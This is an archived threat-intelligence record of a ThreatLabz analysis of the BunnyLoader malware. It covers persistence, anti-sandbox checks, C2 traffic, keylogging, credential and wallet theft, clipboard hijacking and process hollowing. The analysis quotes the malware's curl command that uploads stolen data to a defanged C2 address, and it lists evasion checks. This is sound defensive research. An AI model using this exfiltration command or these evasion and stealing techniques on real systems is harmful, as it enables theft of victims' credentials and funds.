{
	"id": "45c91e7a-3a24-4f68-9f97-b5a62710a3b2",
	"created_at": "2026-04-06T00:11:16.865041Z",
	"updated_at": "2026-04-10T03:37:09.116225Z",
	"deleted_at": null,
	"sha1_hash": "9ea30f552e9f31c5cf5c9f7bc1087ede8053274d",
	"title": "BunnyLoader | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1020193,
	"plain_text": "BunnyLoader | ThreatLabz\r\nBy Niraj Shivtarkar, Satyam Singh\r\nPublished: 2023-09-29 · Archived: 2026-04-05 16:55:08 UTC\r\nTechnical Analysis\r\nIn the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the\r\nloader performs the following actions:\r\n1. Creates a new registry value named “Spyware_Blocker” in the Run registry key\r\n(HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) where the value is\r\nthe path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the\r\nmachine.\r\n2. Hides the window using ShowWindow() with nCmdShow as SW_HIDE\r\n3. Creates a mutex named “BunnyLoader_MUTEXCONTROL” via CreateMutexW()\r\n4. Performs the following anti-VM techniques:\r\nChecks for the following modules:\r\nSxIn.dll - 360 Total Security\r\ncmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus\r\nwine_get_unix_file_name - Detects Wine\r\nSbieDll.dll - Sandboxie\r\nChecks for a VM using “ROOT\\CIMV2” WMI queries:\r\nSELECT * FROM Win32_VideoController\r\nWin32_Processor\r\nWin32_NetworkAdapter\r\nWin32_BIOS\r\nSELECT * FROM Win32_ComputerSystem\r\nChecks for a Docker container via “/proc/1/cgroup” - if the container exists, BunnyLoader does not\r\nperform further malicious actions.\r\nChecks for the following blacklisted sandbox usernames:\r\nANYRUN\r\nSandbox\r\nTest\r\nJohn Doe\r\nAbby\r\nTimmy\r\nMaltest\r\nmalware\r\nEmily\r\nTimmy\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 1 of 9\n\nPaul Jones\r\nCurrentUser\r\nIT-ADMIN\r\nWalker\r\nLisa\r\nWDAGUtilityAccount\r\nVirus\r\nfred\r\nIf a sandbox is identified, BunnyLoader throws the following error message:\r\n“The version of this file is not compatible with the current version of Windows you are running. 
Check your\r\ncomputer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and\r\nthen contact the software publisher.”\r\nOtherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:\r\nGET /Bunny/Add.php?country=\u0026ip=\u0026host=\u0026ver=2.0\u0026system=Microsoft+Windows+10+Pro%0A\u0026privs=Admin\u0026av=Windows+Defende\r\nUser-Agent: BunnyLoader\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 11\r\nContent-Type: text/html; charset=UTF-8\r\nConnected\r\nThe registration request sent to the C2 server (shown above) contains the following information:\r\nInformation in C2 server request\r\nValue - Description\r\ncountry - Gathers the country where the infected system is connecting from via “http[:]//ip-api.com/csv”, where the user agent is “BunnyRequester”\r\nip - Gathers the victim IP from “http[:]//api.ipify.org”, where the user agent is “BunnyRequester”\r\nhost - Gathers the hostname via GetComputerNameA\r\nver - The version of BunnyLoader (e.g., 2.0)\r\nsystem - Fetches the operating system via “systeminfo | findstr /B /C:\"OS Name”\r\nprivs - Fetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator, otherwise sends the string “user”.\r\nav - Gathers the anti-virus on the infected machine via wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName /value\r\nThe user agent for the request is set to “BunnyLoader”. 
If the response from the C2 is “Connected”,\r\nBunnyLoader performs the core malicious actions.\r\nTask Execution\r\nAfter registration, BunnyLoader sends a task request to the C2 server\r\n“http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=” with the user agent “BunnyTasks”. As shown\r\nbelow, the response to the task request consists of the “ID”, “Name” and “Params”.\r\nGET /Bunny/TaskHandler.php?BotID= HTTP/1.1\r\nUser-Agent: BunnyTasks\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 102\r\nContent-Type: text/html; charset=UTF-8\r\nID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc15k\r\nHere the “Name” is the module (functionality) to be executed and the “Params” are the parameters passed to the\r\nmodule. Based on the module name received in the task response, BunnyLoader further performs its actions.\r\nBunnyLoader consists of the following tasks:\r\nTrojan Downloader\r\nDownload and Execute (Fileless Execution)\r\nDownload and Execute (Disk Execution)\r\nIntruder\r\nRun Keylogger\r\nRun Stealer\r\nClipper\r\nBitcoin\r\nMonero\r\nEthereum\r\nLitecoin\r\nDogecoin\r\nZCash\r\nTether\r\nRemote Command Execution\r\nRun Keylogger Task\r\nBunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging keystrokes. The output of\r\nthe keylogger is stored in the file “C:\\Users\\\\AppData\\Local\\Keystrokes.txt”.\r\nRun Stealer Task\r\nBunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much\r\nmore. Eventually the stolen information is stored in a folder named “BunnyLogs” in the AppData\\Local directory,\r\nwhich is compressed as a ZIP archive, and exfiltrated to the C2 server. 
The following are the web browsers\r\ntargeted by BunnyLoader:\r\n7Star\\7Star\\User Data\r\nYandex\\YandexBrowser\\User Data\r\nCentBrowser\\User Data\r\nComodo\\User Data\r\nChedot\\User Data\r\n360Browser\\Browser\\User Data\r\nVivaldi\\User Data\r\nMaxthon3\\User Data\r\nKometa\\User Data\r\nK-Melon\\User Data\r\nElements Browser\\User Data\r\nGoogle\\Chrome\\User Data\r\nSputnik\\Sputnik\\User Data\r\nEpic Privacy Browser\\User Data\r\nNichrome\\User Data\r\nuCozMedia\\Uran\\User Data\r\nCocCoc\\Browser\\User Data\r\nFenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\r\nUran\\User Data\r\nCatalinaGroup\\Citrio\\User Data\r\nChromodo\\User Data\r\nCoowon\\Coowon\\User Data\r\nMail.Ru\\Atom\\User Data\r\nliebao\\User Data\r\nMicrosoft\\Edge\\User Data\r\nQIP Surf\\User Data\r\nBraveSoftware\\Brave-Browser\\User Data\r\nOrbitum\\User Data\r\nChromium\\User Data\r\nComodo\\Dragon\\User Data\r\nGoogle(x86)\\Chrome\\User Data\r\nAmigo\\User\\User Data\r\nMapleStudio\\ChromePlus\\User Data\r\nTorch\\User Data\r\nIridium\\User Data\r\nBunnyLoader steals the following information from these web browsers:\r\nAutoFill data\r\nCredit cards\r\nDownloads\r\nHistory\r\nPasswords\r\nThe malware targets the following cryptocurrency wallets:\r\nArmory\r\nExodus\r\nAutomaticWallet\r\nBytecoin\r\nEthereum\r\nCoinomi\r\nJaxx\r\nElectrum\r\nGuarda\r\nBunnyLoader steals credentials from the following VPN clients:\r\nProtonVPN\r\nOpenVPN\r\nCredentials are also stolen from the following messaging applications:\r\nSkype\r\nTox\r\nSignal\r\nElement\r\nICQ\r\nExamples of the stolen information are shown in the figure below. 
The logs consist of an information.txt file\r\nwhich contains system information along with the information related to the location of the infected machine.\r\nEach folder contains the corresponding data stolen from the system. For example, the Browser folder contains the\r\nweb browser history and downloaded file information.\r\nFigure 5: A screenshot of the information exfiltrated by BunnyLoader.\r\nThe stolen data is archived using the PowerShell cmdlet: System.IO.Compression.ZipFile with the filename\r\n“BunnyLogs_.zip”. The ZIP archive is exfiltrated to the C2 server via the following curl command:\r\ncmd.exe /c curl -F\r\n\"file=@C:\\Users\\user\\AppData\\Local\\BunnyLogs_468325.zip\"\r\nhttp[:]//37[.]139[.]129[.]145/Bunny/Uploader.php\r\nBunnyLoader also performs a stealer registration request containing statistics related to the stolen information and\r\nthe link to the exfiltrated logs with the user agent “BunnyStealer”, as shown below:\r\nGET /Bunny/StealerRegistration.php?country=\u0026ip=\u0026system=Microsoft+Windows+10+Pro%0A\u0026chromium=18\u0026crypto=1\u0026messages=0\u0026vpn=0\u0026keys=0\u0026link=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_468325.zip\u0026date=Mon+Sep+25+21%3A47%3A41+2023%0A\u0026games=0 HTTP/1.1\r\nUser-Agent: BunnyStealer\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nClipper Task\r\nThe BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and\r\nreplaces them with a wallet address controlled by the threat actor.\r\nIn this case, the targeted cryptocurrencies are:\r\nBitcoin\r\nMonero\r\nEthereum\r\nLitecoin\r\nDogecoin\r\nZCash\r\nTether\r\nThe clipper receives the cryptocurrency wallet addresses to replace from the C2 
server.\r\nDownload and Execute Task\r\nBunnyLoader performs two types of download and execute functions.\r\nThe first type is downloading a file from a URL provided by the C2, which is written to disk in the\r\nAppData\\Local directory and further executed.\r\nThe second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a\r\nsuspended state and then downloads the payload from the received URL with the user agent\r\n“BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader\r\nperforms Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in\r\nthe figure below.\r\nFigure 6: A screenshot of BunnyLoader's fileless download and execute code.\r\nAfter the tasks are completed, BunnyLoader sends the following task completion request with the user agent as\r\n“TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:\r\nhttp://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5\u0026BotID=272148461\r\nRemote Command Execution Task\r\nBunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to\r\nbe executed on the infected machine via an “echoer” request to the C2 server (e.g.,\r\nhttp[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the\r\nfigure below. 
BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd”, and\r\nthen executes the command using _popen. The command output is sent to the C2 server as the\r\n“\u0026value=” parameter in a result command request (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php)\r\nwith the user agent “BunnyShell”.\r\nFigure 7: A screenshot of BunnyLoader remote command execution.\r\nBunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online, as\r\nshown below. The user agent for the heartbeat is “HeartBeat_Sender”.\r\nGET /Bunny/Heartbeat.php?country=\u0026ip=\u0026host=\u0026ver=2.0\u0026system=Microsoft+Windows+10+Pro%0A\u0026privs=Admin\u0026av=Windows+D\r\nUser-Agent: HeartBeat_Sender\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 13\r\nContent-Type: text/html; charset=UTF-8\r\nClient online\r\nSource: https://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service"
	],
	"report_names": [
		"bunnyloader-newest-malware-service"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434276,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.pdf",
		"text": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.txt",
		"img": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.jpg"
	}
}